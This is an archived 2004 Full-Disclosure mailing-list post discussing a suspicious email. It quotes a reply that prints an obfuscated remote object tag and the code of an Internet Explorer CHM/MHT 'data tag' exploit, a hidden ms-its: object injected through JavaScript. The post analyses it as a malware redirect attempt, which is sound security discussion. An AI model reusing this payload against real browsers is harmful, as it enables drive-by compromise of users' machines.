lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <893e7f91040825202811bc018f@mail.gmail.com>
From: charles.heselton at gmail.com (Charles Heselton)
Subject: new email virus?

On Wed, 25 Aug 2004 13:50:04 -0700, morning_wood <se_cur_ity@...mail.com> wrote:
> ><object  data="http://www.v%69k%6F%72d.com/default.htm"><br><br>
> 
> this is a data tag .chm exploit
> 
> [textarea id="code" style="display:none;"]
>    [object
> data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
> /default.htm" type="text/x-scriptlet"][/object]
> [/textarea]
> 
> [script language="javascript"]
> 
> document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
> tion.href.indexOf('default.htm'))));
> [/script]
> 
> m.wood
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


Yeah, looks like a blended spam/malware/IE Redirect type exploit
attempt.  If the recipient is dumb enough to click on the link they've
just opened themselves to something "interesting".  ;)

-- 
Charlie Heselton
Network Security Engineer

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ